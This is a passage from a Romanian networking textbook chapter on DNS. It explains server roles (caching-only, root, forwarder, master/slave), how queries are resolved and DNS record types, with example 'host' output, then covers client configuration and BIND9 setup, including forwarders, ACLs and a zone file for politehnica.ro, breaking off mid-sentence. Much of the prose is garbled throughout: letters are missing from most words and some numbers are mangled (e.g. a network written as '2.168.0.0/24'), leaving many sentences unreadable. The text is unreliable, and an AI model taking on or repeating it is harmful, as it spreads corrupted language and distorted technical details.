servere de nume vor folosi de obicei cache-ul pe t u a î toa e ăspu su i lie ţilo ,
ăspu su i a e pot fi ea tualizate. Pe t u a minimiza late ţa p opagă ii s hi ă ilo
efectuate, ad i ist ato ul do e iului poate spe ifi a du ata a i ă de ti p pe t u a e u
ăspu s t i is poate sta î cache-ul altui se e de u e. T e uie eţi ut, î să, faptul ă o
aloa e de o di ul a âto a o e u este e age ată, şi ep ezi tă o p a ti ă destul de o u ă
î I te et. Pe de altă pa te, odifi ă ile î aza de date DN“ u su t atât de dese, astfel ă
a eastă politi ă a e se s, ai ales dato ită faptului ă folosi ea cache-ului DN“ di i uează
foa te ult late ţa ezol ă ii u elo .
Co e ge ţa DN“ este unul dintre cele mai lente procese din Internet.
7.1.2.1 Server DNS Caching-only

P o le a u e e ile e u si e este ă, î a titate a e, pot î g eu a si ţito u se e
DN“. De a eea, este o side ată o p a ti ă u ă a u se e DN“ să a epte e e i doar din
pa tea eţelelo lo ale aflate î do e iul pe t u a e a est se e este auto ita . Da ă
ad i ist ato ul a pe ite e e i e u si e di tot I te etul, se e ul său a putea fi foa te
uşo ata at.
Î o luzie, hia da ă o eţea u a e u do e iu DN“ pe t u ă su t folosite ad ese
p i ate de e e plu , u se e DN“ este totuşi e esa , deoa e e lie ţii DN“ u t i it de ât
e e i e u si e, a e t e uie ezol ate u de a. Î plus, u se e DN“ este util şi pe t u cache-
ul pe a e îl e ţi e. Di a eastă auză e istă şi se e e de u e caching-only. Ele sunt
servere de nume, care rezolva cereri recursive, dar care nu sunt servere autoritare pentru
niciun domeniu.
Notă: da ă u se e u este auto ita peste niciun domeniu (caching-o l , î sea ă ă
răspu sul la o e e e e u si ă a fi dat î totdeau a di a he, sau di ezultatul poziti al u ei
cereri nerecursive efectuate de serverul caching-only.
249 | D N S
7.1.2.2 “er ere DN“ rădă i ă

Serverele rădă i ă su t se e e de u e ad i ist ate de I te NIC, şi a e gestio ează o
parte din domeniile top-level.
Acestea sunt cunoscute de se e ele de u e î od i pli it şi su t de o i ei i te ogate
î od e e u si de ăt e u se e lo al, atu i â d a esta u este auto ita pe t u
do e iul e ut şi i i u posedă i fo aţia în cache. Da ă se e ul ădă i ă u ştie să t adu ă
e e ea, a t i ite se e ului lo al u ăspu s egati , alătu i de u hint care îi va sugera un
alt se e DN“ a e a putea şti să t a slateze u ele i te ogat.
7.1.2.3 Servere DNS forwarder

Da ă u se e de u e t e uie să ăspu dă la o e e e e u si ă de la u lie t, a esta a
î e a ai î tâi să adă da ă u ele i te ogat fa e pa te di do e iul pe t u a e el este
auto ita . Da ă a esta u e auto ita peste do e iul e ut, a î e a să aute i t a ea
espe ti ă î cache. Î azul î a e u o găseşte î cache, se e ul a t e ui să fa ă e e i
e e u si e ăt e alte se e e, pe t u a putea ealiza ezol a ea. Î od o al, se e ul a
i te oga u se e ădă i ă. Ai i i te i e oţiu ea de se e forwarder.
U ad i ist ato poate o figu a pe se e ul său DN“, ad esa IP a u ui se e spe ial a e
va avea un rol de forwarder pe t u a esta. Mai e a t, î situaţia de ai sus, î lo a se e ul
lo al să apeleze la u se e ădă i ă, a apela ai î tâi la serverul forwarder pe care îl are
configurat. Forwarder-ul va consta de obicei dintr-un server chaching-only care va fi cu atât
ai u , u ât e folosit ai des şi de ai ulte se e e. Da ă forwarder-ul u a euşi să dea
u ăspu s poziti la e e ea e e u si ă a se e ului lo al, se a apela la u se e ădă i ă
cunoscut.
O se aţie: Ca să fie efi ie t să ai ă i fo aţie în cache), forwarder-ul va trebui să
p i eas ă şi e e i e u si e.
7.1.2.4 Servere Master/Slave

Di oti e de edu da ţă şi de dist i ui e a î ă ă ii, pot e ista ai ulte se e e
auto ita e pe t u a elaşi do e iu. Cu toate a estea, doa u ul di t e ele a fi se e master,
celelalte vor fi servere slave.
Serverul master poate şte ge, adăuga sau odifi a i t ă i di po ţiu ea sa di aza de
date DNS. Serverele slave o t a sfe a la po i e i fo aţiile de la se e ul master.
În continuare, periodic, serverele slave vor interoga seria bazei de date de la serverul
master. Da ă se ia de la se e ul master este mai mare decât seria curentă a se e ului slave,
acesta va transfera din nou baza de date de la serverul master. Pe t u a edu e late ţa
p opagă ii s hi ă ilo la se e ele slave, protocolul DNS prevede, de asemenea, mecanisme
de notificare a serverelor slave. Atunci când este necesar, în general la pornirea sau repornirea
serverului master, acesta poate notifica serverele slave t i iţâ du-le seria bazei de date.
7.1.3 Tratarea unei cereri DNS

P oto olul DN“ spe ifi ă e iste ţa a două tipu i de ăspu su i la e e ile DN“: răspu suri
autoritare şi răspu suri eautoritare. Doa se e ele e gestio ează u do e iu se e ele
master şi slave ale do e iului pot t i ite ăspu su i auto ita e, şi asta doa pe t u staţiile
din domeniul gestionat.
250 | ‘ e ţ e l e L o a l e
7.1.3.1 Tratarea unei cereri recursive

În continuare se vor sumariza paşii principali ai procesului de tratare a unei cereri
recursive:
 Clie tul fa e o e e e e u si ă ăt e se e ul DN“ lo al.
 Da ă se e ul este auto ita peste u do e iu, a alizează u ele i te ogat pe t u a îşi da
sea a da ă este hia u ele do e iului peste a e este auto ita . Î az afi ati , ofe ă u
ăspu s auto ita .
 Da ă se e ul nu este autoritar peste niciu do e iu sau da ă u s-a putut da u ăspu s
auto ita di e t, se a ăuta î cache-ul se e ului. Bi eî teles ă da ă ăspu sul este găsit î
cache, acesta este oferit clientului.
 Da ă i fo aţia u a fost găsită î cache se a fa e el puţi o e e e e e u si ă.
7.1.3.2 Tratarea unei cereri nerecursive

Î azul î a e u se e lo al u ştie să t adu ă o e e e e u si ă, a easta poate fi
ezol ată u ajuto ul u o e e i e e u si e ad esate pe â d ai ulto se e e de u e. O
e e e e e u si ă a î toa e u ăspu s poziti doa da ă se e ul i te ogat a e i t a ea î
cache sau este autoritar pentru cerere. Altfel, serverul de nu e i te ogat a ăspu de u u
esaj spe ifi â d faptul ă ăspu sul este e u os ut şi i di â d u alt se e de u e. Î
a eastă situţie, se e ul i te ogat de ide da ă e e ea ep ezi tă u do e iu i lus î
do e iul său de auto itate sau u, pe t u a determina serverul recomandat. Se disting deci 2
cazuri:
1. Da ă e e ea este u do e iu i lus î do e iul se e ului, se aută î cache şi a fi i di at
se e ul pe t u el ai spe ifi do e iu al e e ii. Da ă niciunul dintre domeniile specifice nu
se află în cache se a da u ăspu s auto ita e poate fi poziti sau egati . “p e e e plu,
da ă e e ea eglab.rc.cs.pub.ro ajunge la serverul autoritar pentru domeniul pub.ro,
ai î tâi a fi ăutat î cache numele complet eglab.rc.cs.pub.ro. Da ă a esta u este
găsit, se a ăuta rc.cs.pub.ro. Da ă şi a eastă ăuta e a eşuat se a ăuta ad esa
cs.pub.ro î fişie ele de o figu aţie lo ale. Da ă a easta e istă, ăspu sul a fi poziti , altfel
ăspu sul a fi ăspu s auto ita egati .
2. Da ă e e ea u este i lusă î do e iul se e ului i te ogat, a esta a i di a se e ul di
cache pentru cel mai specific domeniu al cererii. Astfel, pentru cererea
orange.csl.cmu.edu a fi ăutat î cache ai î tâi u ele o plet. Da ă a esta u este
găsit se a ăuta csl.cmu.edu, apoi cmu.edu şi î fi al doa do e iul edu. Da ă i iuna
di t e a este ăută i u s-a î heiat u su es a fi i di at u se e ădă i ă.
7.1.3.3 Exemplu de rezolvare a unei cereri

Pentru exemplificare, se o side ă o apli aţie e t e uie să ezol e u ele
www.linux.org şi ă apli aţia ulează pe staţia lemon.cs.pub.ro, care are configurat ca
server de nume serverul cs.pub.ro. Paşii u aţi su t:
1. “taţia lemon.cs.pub.ro trimite o e e e e u si ă serverului cs.pub.ro î a e soli ită

aflarea adresei asociate numelui www.linux.org;
2. “e e ul a î epe p i a a aliza apa te e ţa u elui www.linux.org la domeniul pe care îl
gestio ează; î t u ât u fa e pa te, se t e e la u ăto ul pas;
3. “e e ul e ifi ă e iste ţa ad esei î cache; se p esupu e ă ad esa u se găseşte î cache; în
a est az se t e e la pasul u ăto ;
4. Da ă se e ul a e o figu at u se e de forwarding, atunci va trimite o e e e e e u si ă
serverului de forwarding; în caz contrar va trimite o e e e e e u si ă unuia dintre serverele
ădă i ă; î azul de faţă, se a o side a ă se e ul ns.pub.ro - 141.85.37.8 este configurat
ca server de forwarding;
251 | D N S
5. Cererea ajunge la serverul ns.pub.ro a e a ăuta î cache adresa statiei www.linux.org;

se p esupu e ă ad esa u se găseşte î cache; drept conse i ţă, se e ul î toa e u ăspu s
negativ, specificând ca hint serverul ădă i ă B.root-servers.net - 192.228.79.201;
6. “e e ul s.pu . o a t i ite e e ea se e ului ădă i ă B.root-servers.net; acesta va
ăuta ad esa statiei www.linux.org în cache; se p espu e, di ou, ă u găseşte ad esa î
cache, astfel ă a t i ite u ăspu s egati iar ca hint serverul de nume asociat domeniului
.org, să spu e ns.org - 216.66.41.146;
7. Serverul cs.pub.ro trimite atunci cererea serverului ns.org; a esta a ăuta ad esa
www.linux.org în cache; se presupune ă u o a găsi; a t i ite, de i, u ăspu s egati ,
iar ca hint serverul asociat domeniului linux.org, să spu e ns.linux.org;
8. În continuare, serverul cs.pub.ro trimite cererea serverului ns.linux.org; acesta, fiind
serverul autoritar pentru zona linux.org, a ăuta ad esa www.linux.org în baza de date
şi a î toa e u ăspu s poziti şi auto ita u ad esa IP aso iată;
9. Serverul cs.pub.ro î toa e ăspu sul staţiei lemon.cs.pub.ro şi îl i t odu e î cache.
Pe t u a î ţelege ai i e, toate e e ile şi ăspu su ile i pli ate î ezol a ea e e ii au

fost ep eze tate î figu a de ai jos. Ce e ile su t ep eze tate u li ie o ti uă, î ti p e
ăspu su ile su t ep eze tate u li ie pu tată. Pe t u fie a e e e e sau ăspu s a fost
ep eze tată i fo aţia soli itată, espe ti ofe ită şi a p e ta de ti p o espu zătoa e.
7-2: Exemplu de cerere DNS
7.1.4 Structura bazei de date DNS.

Î se ţiu ile p e ede te, st u tu a azei de date DN“ a fost p eze tată si plifi at, pe t u
a e pli a ai uşo o eptele. “-a ăzut ă aza de date DN“ este de fapt u a o e ulti ăi î
care nodurile sunt reprezentate de domenii, iar frunzele de staţii. Î ealitate, î să, lu u ile
su t e a ai o ple e. Baza de date DN“ este st u tu ată a u a o e ulti ăi; totuşi ea u
eţi e do e ii, staţii şi se e e, i î registrări DN“ de fo a heie, i fo aţie .
Cheia este ep eze tată de u u e o plet şi este dist i uită î odu ile a o elui. O
heie poate a ea aso iate ai ulte i fo aţii, î ge e al de tipu i dife ite, da u o ligato iu.
Baza de date DN“ este astfel st u tu ată î ât u ajuto ul heii să se lo alizeze i fo aţiile
asociate.
Înregistrările su t de ai ulte tipu i, g upate după fu ţio alitate: î egist a e pe t u
ope aţiile de ăuta e, î egist a e pe t u ope aţiile de ăuta e i e să reverse lookup),
252 | ‘ e ţ e l e L o a l e
înregistrare pentru serverele de nume, etc. Fiecare dintre tipurile de înregist ă i su t

u os ute î te i ologia DN“ după e o i i, ele ai folosite fii d î egist ă ile: A,
CNAME, MX, NS, PTR, SOA.
7.1.4.1 Î registrări DNS

Î o ti ua e se p ezi tă des ie ea âto a tipu i de î egist ă i di aza de date DN“ şi
rezultatele întoarse la interogarea bazei de date pentru fiecare dintre acestea. Pentru
interogare s-a folosit utilitarul host prezent în sistemele UNIX.
 A ide tifi ă î egist ă i de tip adresă, fii d folosite pe t u ezol a ea di e tă a u elui. Aceste
î egist ă i aso iază hei de tip u e de staţie de genul www.kde.org cu o adresă IPv4.
Pe t u a aso ia hei de tip u e de do e iu u o ad ese IP se foloses î egist ă i de tip
AAAA.
user@orange:~$ host -t A cs.pub.ro
cs.pub.ro has address 141.85.37.5
 PTR ide tifi ă î egist ări de tip pointer şi su t folosite pe t u ezol a ea i e să. A estea
aso iază hei de tip adresa IP de genul 1.37.85.141.in-addr.arpa cu un nume de domeniu
complet.
user@orange:~$ host -t PTR 1.37.85.141.in-addr.arpa
1.37.85.141.in-addr.arpa domain name pointer csr.cs.pub.ro.
 NS ide tifi ă î egist ă i de tip server de nume (name server şi su t folosite pe t u a i di a

numele serverelor de nume autoritate (atât cele master ât şi ele slave, da ă este azul
asociate domeniului specificat în cheie. Înregist ă ile de tip NS sunt folosite pentru delegarea
de subdomenii ăt e alte se e e de u e.
user@orange:~$ host -t NS cs.pub.ro
cs.pub.ro name server pub.pub.ro.
cs.pub.ro name server ns.cs.pub.ro.
 MX ide tifi ă î egist ă i de tip server de mail şi su t folosite pentru a indica numele serverelor
de mail responsabile pentru mailurile destinate domeniului specificat în cheie. Adresa
se e elo de ail se spe ifi ă u ajuto ul u o î egist ă i de tip ad esă.
user@orange:~$ host -t MX cs.pub.ro
cs.pub.ro mail is handled by 5 mail.cs.pub.ro.
 SOA ide tifi ă î egist ă i de tip start of authority e spe ifi ă di e şi parametri pentru
domeniul indicat în cheie: seria bazei de date, intervalul de timp la care serverul slave e ifi ă
seria, adresa de mail a administratorului de domeniu, etc.
user@orange:~$ host -t SOA cs.pub.ro
cs.pub.ro has SOA record ns.cs.pub.ro. admin.cs.pub.ro. 2007072101 28800 7200 604800
86400
 TXT ide tifi ă o î egist a e de tip descriere. A easta aso iază u ele de staţie indicat de
cheie cu un text de descriere ASCII.
user@orange:~$ host -t TXT cs.pub.ro
cs.pub.ro descriptive text "UPB, Computer Science Departament"
 CNAME ide tifi ă o î egist a e de tip alias. Un alias este un nume de domeniu alternativ
pentru numele specificat în cheie. Aliasul a fi aso iat u a eeaşi ad esă u a e este aso iată şi
cheia. De exemplu, considerând aliasul mail.cs.pub.ro la numele prof.cs.pub.ro, şi
presupuând ă ad esa prof.cs.pub.ro este 141.85.37.3, atunci adresa
mail.cs.pub.ro va fi 141.85.37.3.
user@orange:~$ host -t CNAME mail.google.com
mail.google.com is an alias for googlemail.l.google.com.
253 | D N S
Ca o o se aţie heile folosite î DN“ u ele do e iilo , staţiilo , et . su t li itate la

caractere alfanumerice (a-z, A-Z, 0- şi a a te ul '-'. Numele de domeniu complete nu pot
depăşi de a a te e, ia u ele de do e iu elati e u pot depăşi de a a te e.
7.2 Configurări de bază DNS

7.2.1 Configurarea clientului DNS pe Linux
7.2.1.1 Fişierul /etc/resolv.conf

Î UNIX, i fo aţiile legate de se e ele de u e folosite î i te ogă ile DN“ şi alte
opţiu i DN“ su t păst ate î fişie ul /etc/resolv.conf.
Pe t u a o figu a se e ul DN“ espo sa il u ezol a ea e e ilo se adaugă o di e ti ă
de tipul nameserver adresa_ip. Se pot folosi mai multe servere DNS, pentru fiecare trebuind
adaugată o di e ti ă sepa ată:
$ cat /etc/resolv.conf
În cazul în care sunt configurate mai multe servere DNS, se va interoga întotdeauna
p i ul. Celelalte se e e se i te oghează doa da ă se e ul i te ogat a te io u ăspu de.
7.2.1.2 Fişierul /etc/nsswitch.conf

Pe siste ele UNIX e istă ai multe metode de rezolvare a numelor: DNS, NIS,
/etc/hosts, LDAP, et . “ele ţia p io ităţii pe t u a este etode de ezol a e a u elo
staţiilo da u u ai, deoa e e la fel pot fi ezol ate şi u ele utilizato ilo î UID-u i şi GID-
u i, de e e plu se ealizează u ajuto ul fişie ului de o figu aţie /etc/nsswitch.conf .
“i ta a a estui fişie este u ătoa ea:
bază_de_date_1: sursă_1_1 sursă_1_2 ...
bază_de_date_2: sursă_2_1 sursă_2_2 ...
...
Câmpul bază_de_date poate fi hosts pe t u ezol a ea u elo staţiilo , passwd pentru

rezolvarea numelor de utilizatori, group pentru rezolvarea numelor grupurilor de utilizatori,
etc. Câmpurile su să_ _ , su să_ _ spe ifi ă ordinea metodelor folosite pentru rezolvarea
numelor. Cele mai folosite metode sunt:
 files pe t u a folosi fişie ele de o figu aţie di di e to ul /etc (e.g. /etc/hosts o ţi e o
listă de o espo de ţe stati e î t e u e de staţii şi ad ese IP
 DNS pentru a folosi se e ul de u e spe ifi at î fişie ul /etc/resolv.conf
 NIS pe t u a folosi p oto olul de ad i ist a e e t alizată NI“ Network Information Service).
7.2.2 Utilitare de interogare DNS

În continuarea acestui capitol se va prezenta configurarea unui server DNS pe Linux.
Dato ită o ple ităţii siste ului DN“, i e ita il o apă ea p o le e auzate de o g eşeală de
o figu a e, de o figu aţii ei spi ate sau hia de o e ge ţa le tă a p oto olului. De
aceea se vor prezenta mai întâi moduri de interoga e şi e ifi a e a se i iului.
Î lu ea UNIX e istă t ei utilita e ai des folosite: nslookup, host şi dig. Cel mai vechi
dintre ele, nslookup, a e u e hi ale t u a elaşi u e pe platfo ele Wi do s. Î ele e
u ează va fi prezentat doar utilitarului host. Utilitarul nslookup este considerat învechit, iar
dig a e o si ta ă ai o pli ată şi u output ai g eu de î ţeles.
254 | ‘ e ţ e l e L o a l e
7.2.2.1 Utilitarul host

Sintaxa de utilizare a comenzii host este u ătoa ea:
host [-v] [-t tip] [-r] [-l] nume [server]
Comanda va încerca să ezol e u ele nume folosind fie
serverul server da ă a esta este
p eze t î li a de o a dă, fie se e ul i pli it o figu at î /etc/resolv.conf în caz
contrar.
Opţiu i ale o e zii su t:
 -t Tipul î egist ă ii folosit la i te oga e poate fi o figu at u ajuto ul opţiu ii -t, şi poate fi
unul dintre acronimele definite de standardul DNS (A, PTR, NS, etc.) sau ANY pentru a întoarce
toate î egist ă ile aso iate u heia de ăuta e u ele , i dife e t de tipul î egist ă ii. Da ă
u se foloseşte opţiu ea -t, atunci host va folosi în mod implicit fie A, fie PTR î fu ţie de
u ele de i te ogat: da ă u ele sea ă ă u o ad esă IP, se a folosi PTR, altfel A;
 -r Î od i pli it i te ogă ile ealizate de host su t i te ogă i e u si e. Pe t u i te ogă i
ne e u si e, t e uie folosită opţiu ea –r;
 -l U eo i poate fi utilă afişa ea tutu o i t ă ilo di t -o a u ită zo ă. Cu host acest lucru se
poate fa e utilizâ d opţiu ea –l. P a ti , la folosi ea a estei opţiu i, host a î e a să fa ă
u t a sfe de zo ă. Î fu ţie de o figu a ea se e ului, a eastă ope aţie poate fi sau u
pe isă. Da ă t a sfe ul de zo ă a fost efe tuat, host a filt a apoi î egist ă ile î fu ţie de
tipul de î egist a e spe ifi at î li ia de o a dă. Da ă u se spe ifi ă niciun tip de
î egist a e î li ia de o a dă, host a lista î egist ă ile de tip A şi PTR;
 -v Opţiu ea -v (verbose) a afişa odată u i fo aţiile e ute şi alte i fo aţii e epţio ate
î ăspu sul p i it de la se e .
7.2.3 Configurarea serverului DNS – BIND9

Una dintre p i ele i ple e tă i ale u ui se e de DN“ a fost fă ută de ăt e
Universitatea Berkeley din California. BIND (Berkeley Internet Name Server Daemon) este de
depa te ea ai ăspâ dită i ple e ta e de se e DN“. Pe t u des ie ea se e ului se va
folosi e siu ea . A easta este ea ai e e tă di t e e siu ile sta ile.
7.2.3.1 Instalarea serverului

Petru a instala BIND pe siste ele U u tu/De ia se foloseşte utilita ul apt.
waters@myr:~$ sudo apt-get install bind9
Odată i stalat, se e ul DN“ îşi a pu e toate fişie ele de o figu a e î /etc/bind.
7.2.3.2 Por irea, oprirea şi restartea ser erului

O i e se e i stalat pe u siste U u tu/De ia îşi a i stala u s ipt de i iţializa e î
/etc/init.d/. Î azul BIND, a est s ipt poa tă u ele de bind9. Acesta poate primi ca
parametrii: start, stop, restart.
waters@myr:/home/rl# /etc/init.d/bind9 stop
* Stopping domain name service... bind [ OK ]
waters@myr:/home/rl# /etc/init.d/bind9 start

* Starting domain name service... bind [ OK ]
waters@myr:/home/rl# /etc/init.d/bind9 restart

7.2.3.3 Fişierul principal de configurare

Fişie ul p i ipal de o figu aţie este /etc/bind/named.conf. A esta up i de două
pă ţi: o p i ă pa te de opțiu i şi o a doua de defi i e de zone (domenii). De asemenea,
255 | D N S
î ai tea pă ţii de opţiu i poate fi p e izat u fişie al ă ui o ţi ut a fi i lus î fişie ul de

configurare prin folosirea unei directive de tipul:
include fisier;
Pe t u o o ga iza e ai u ă se e o a dă a opţiu ile se e ului să fie o pletate î

fişie ul /etc/bind/named.conf.options, iar definirea de zo e să se fa ă î fişie ul
/etc/bind/named.conf.local. Fişie ul /etc/bind/named.conf a o ţi e doa opţiu ile
glo ale şi de la aţia de zo ă i pli ită localhost şi a i lude ele două fişie e a te ioa e.
De fapt, ele fişie e su t i luse î od i plicit de la instalarea serverului:
include "/etc/bind/named.conf.options";
// zone default – sintaxa suportă comentarii C,C++,shell
include "/etc/bind/named.conf.local";
Atât si ta a DN“ ât şi opţiu ile puse la dispoziţie su t destul de g eu de î ţeles î afara

u ui o te t p a ti şi de a eea, î o ti ua e se o p eze ta o figu aţii î epâ d de la ele
ai si ple şi des î tâl ite se e caching-only, se e auto ita pe u si gu do e iu pâ ă la
o figu aţii a a sate split-brain DNS, master/slave, ACL-u i, delegă i de su do e ii . Pe
e e plele ofe ite se a ele a i po ta ţa fie ă ei opţiu i şi se a dis uta şi si ta a folosită
pentru definirea zonelor (domeniilor).
7.2.3.4 Configurarea unui server caching-only

Odată i stalat, se e ul BIND a po i p i t -u s ipt de i iţializa e. Deşi i iţial u a fost
configurat niciun do e iu sau zo ă, în terminologia BIND), serverul poate îndeplini rolul de
caching-only server în mod implicit. Acest lucru este posibil deoarece serverul de nume are în
fişie ul db.root, adresele mai multor se e e ădă i ă pe a e le poate î t e a de p a ti
orice domeniu. “e e ele ădă i ă su t g upate î do e iul root-servers.net şi su t
numite A, B, C, D, etc.
waters@myr:~$ cat /etc/bind/db.root
[...]
A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4
A.ROOT-SERVERS.NET. 3600000 AAAA 2001:503:BA3E::2:30
;
; formerly NS1.ISI.EDU
;
. 3600000 NS B.ROOT-SERVERS.NET.
B.ROOT-SERVERS.NET. 3600000 A 192.228.79.201
;
; formerly C.PSI.NET
;
. 3600000 NS C.ROOT-SERVERS.NET.
C.ROOT-SERVERS.NET. 3600000 A 192.33.4.12
[...]
7.2.3.4.1 Configurarea unui server forwarder

Î a est o e t i te oga ea DN“ du ează destul de ult pe t u u ele de do e iu e
nu se află î cache. Pe t u a putea o ţi e pe fo a ţe ai u e se pot o figu a u ul sau ai
multe servere cu rol de forwarder. Î fişie ul /etc/bind/named.conf.options de mai jos s-a
configurat ca server forwarder, IP-ul serverul de DNS oferit de ISP.
options {
directory "/var/cache/bind";
[…]
forwarders {
141.85.37.11;
};
};
256 | ‘ e ţ e l e L o a l e
Directiva directory sta ileşte di e to ul de lu u. Di a est di e to su t î ă ate fişie ele

i di ate î se ţiu ea de defi i e de zo e da ă u su t p e izate p i ăi a solute. Tot î a est
di e to se e ul eează fişie e te po a e şi poate ea fişie e e o ţi i t ă ile di cache.
Directiva forwarders permite introducerea unor adrese IP care vor fi folosite ca servere
forwarder ce vor fi întrebate mereu primele pentru o traducere ce nu s-a putut efectua local.
Atentie! “i ta a a estei di e ti e, a şi a ulto alto a di o figu aţia BIND, este destul
de igidă.
7.2.3.4.2 Configurarea de ACL-uri. Directiva allow-query.

“i gu a p o le ă este a se e ul pâ ă a u o figu at ăspu de la e e i e u si e
efectuate de orice host din Internet care poate accesa serverul. Nefiind autoritar peste niciun
domeniu, acest server nu are niciun oti pe t u a fi i te ogat di afa a eţelei lo ale. Într-
u s e a iu eal, o figu aţia u ui se e caching-only a a ăta astfel:
acl LAN {
192.168.0.0/24;
};
options {
directory "/var/cache/bind";
allow-query { LAN; };
[…]
forwarders {
141.85.37.11;
};
};
La fişie ul /etc/bind/named.conf.options, de mai sus, s-au adăugat o po e te:

 s-a definit un acl (access control list) DNS foarte simplu cu numele de LAN. Directiva acl
ealizează o aso ie e î t e u ele „LAN şi eţeaua 2.168.0.0/24.
 s-a folosit directiva allow-query prin care s-au p e izat lie ţii e pot trimite cereri serverului
de u e. A gu e tul di a olade, ofe it di e ti ei, a fi putut fi di e t ad esa de eţea, î să se
p efe ă folosi ea u ui acl pentru scalabilitate: un acl poate a ea o st u tu ă destul de
comple ă, pe iţâ d u ele su eţele şi egâ d a esul alto a.
Co luzio â d, o figu aţia de ai sus:
 permite cereri doar din partea IP-u ilo di eţeaua . . . / ;
 foloseşte a forwarder serverul DNS cu adresa 141.85.37.11;
 sto hează fişie ele pe t u cache în /var/cache/bind.
7.2.3.5 Configurarea unui server autoritar peste un domeniu

Î ge e al u se e de u e auto ita ştie să fa ă atât ope aţia de ezol a e di e tă ât şi
ope aţia de ezol a e i e să pe t u u do e iu pe a e îl deţi e. Pe t u fie a e tip de
rezolvare este nevoie de definirea unei zone.
Î te i ologia DN“, o zo ă ep ezi tă u od de a g upa i fo aţia de a e este e oie
pentru a face una dintre ezol ă i: di e tă sau i e să.
Deci daca se do eşte ealiza ea ezol ă ii di e te şi i e se, t e uie defi ite zo e, pe t u
fie a e do e iu. După u s-a specificat, pe t u ezol a ea i e să a t e ui eat u
subdomeniu de tipul: IP.in-addr.arpa.
Pentru exemplificare se va presupune crearea zonei politehnica.ro, alătu i de zo a in-
addr.arpa o espu zătoa e. “pe ifi aţiile pe a e do e iul a t e ui să le espe te, su t
după u u ează:
 serverul de nume pentru domeniul politehnica.ro este ns.politehnica.ro şi are
adresa IP 142.100.111.53
 serverul de nume ns.politehnica.ro a ăspu de la e e i pe t u î egist ă ile:
257 | D N S
o www.politehnica.ro – 142.100.111.80
o ftp.politehnica.ro – 142.100.111.21
mail.politehnica.ro – 142.100.111.25

o
se e ul a ofe i posi ilitatea de ezol a e i e să di ad ese IP î nume
Ope aţia de a ea o zo ă pe t u a e se e ul de u e să fie auto ita , o stă di paşi:
 Definirea zonei î fişie ul /etc/bind/named.conf.local sau î fişie ul p i ipal de
configurare.
 Introducerea parametrilor zonei şi ezol ă ile pe t u dife ite adrese, într-un fişier de zo ă
fişie de o figu a e pe t u espe ti a zo ă .
7.2.3.5.1 Definirea zonei

Fişie ul /etc/bind/named.conf.local a t e ui sa o ţi ă u ătoa ele i fo aţii desp e
zona:
 Numele zonei
 Calea î siste ul de fişie e ăt e fişie ul de o figurare al zonei
 Tipul zonei (master/slave)
O defi i e o e tă pe t u ele zo e ale do e iului politehnica.ro, a ată astfel:

waters@myr:~$ cat /etc/bind/named.conf.local
zone "politehnica.ro" {
type master;
file "/etc/bind/db.politehnica.ro";
};
zone "111.100.142.in-addr.arpa" {
type master;
file "/etc/bind/db.111.100.142.in-addr.arpa";
};
Se va a aliza î o ti ua e si ta a şi fu ţio alitatea fişie ului de ai sus.

Pe t u a putea spe ifi a o zo a se foloseşte di e ti a zone u ată de numele efectiv al
zo ei, plasat î t e ghili ele, tipul şi alea ăt e fişie ul de o figu a e al zo ei dată î fo at
a solut. Da ă î lo ul ăii a solute s-ar fi specificat numele în mod relativ:
db.politehnica.ro şi espe ti db.111.100.142.in-addr.arpa, serverul DNS ar fi
o ate at u ele î od i pli it la alea efe ită de di e ti a directory. Cum aceasta este
setată i pli it la ad esa /var/cache/bind/, ad esa fi ală a fi fost /var/cache/bind/
db.politehnica.ro.
Notă: nu este obligatoriu ca numele fişie elo de zo ă să espe te o e ţia de u e

db.nume_domeniu, î să odul a esta de de u i e a fost adoptat de ajo itatea
ad i ist ato ilo pe t u a ofe i u od la de a e u oaşte fişie ul de zo ă al fie a ui
domeniu.
Ate ţie! Sintaxa de definire a zo ei este destul de st i tă şi t e uie ealizată u ăi d

exemplul de mai sus.
7.2.3.5.2 Fişiere de zo ă
După u se o se ă di si ta a fişie ului p i ipal de o figu aţie, fie a e do e iu sau
zo ă a e aso iat u fişie de o figu aţie. A esta o ţi e p a ti aza de date DNS pentru
do e iu. Fişie ul o ţi e ai ulte î egist ă i DN“, fie a e î egist a e fii d des isă pe u
si gu â d. E epţie fa î egist ă ile de tip SOA a e se î heie odată u a a te ul „)”.
258 | ‘ e ţ e l e L o a l e
Î egist ă ile su t st u tu ate la â dul lo î â pu i sepa ate de spaţii sau ta -uri. Formal,
st u tu a fişie elo de zo ă este u ătoa ea:
$INCLUDE fişier nume_domeniu //
$ORIGIN nume_domeniu // parametrii de zonă
$TTL ttl //
Nume_domeniu ttl clasa tip informaţii // înregistrare DNS
Da ă u ele u ui do e iu u se te i ă u . atunci este considerat nume incomplet.

Pentru a afla numele o plet folosit î î egist ă i se o ate ează u domeniu
nume_domeniu definit de operatorul $ORIGIN.
O g eşeală f e e tă atu i â d se editează fişie ele de o figu aţie pe t u zo e este

s ie ea i o e tă a u elo o plete, p i uita ea apli ă ii pu tului la sfâ şitul u elui.
Operatorul $INCLUDE spe ifi ă fişie ul e a fi i lus î ai te de pa sa e. Da ă este p eze t
şi pa a et ul nume_domeniu, acesta va preciza numele concatenat la numele incomplete, dar
doa pe t u î egist ă ile di fişie ul i lus.
Operatorul $ORIGIN p e izează numele ce se va concatena la numele incomplete din
se ţiu ea e u ează.
Operatorul $TTL i di ă ti pul a i pe t u a e u ăspu s poziti pe t u i t ă i di
se ţiu ea u e tă poate sta î cache-ul altor servere.
7.2.3.5.3 Configurarea fişierului de zo ă pe tru rezolvare dire tă

Pe t u o ai u ă î ţelege e a pa a et ilo de ai sus şi a si ta ei î egist ă ilo DN“, se
a a aliza odul î a e a t e ui o pletat fişie ul de zo ă db.politehnica.ro.
$ORIGIN ro.
$TTL 36000
politehnica IN SOA ns.politehnica.ro. admin.politehnica.ro. (
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
politehnica TXT "Universitatea Plitehnica Bucuresti"
politehnica NS ns.politehnica
politehnica MX 10 mail.politehnica
politehnica A 142.100.111.53
ns.politehnica IN A 142.100.111.53
mail.politehnica IN A 142.100.111.25
www.politehnica.ro. IN A 142.100.111.80
ftp.politehnica.ro. IN A 142.100.111.21
Parametrul $ORIGIN va avea ca efect concatenarea domeniului ro. Tuturor domeniilor din
fişie e u se te i ă u a a te ul . (punct). Spre exemplu numele ns.politehnica se va
transfo a după pa sa e î ns.politehnica.ro.
Di pu t de ede e fu ţio al, fişie ul de o figu a e de ai sus s-ar traduce astfel:
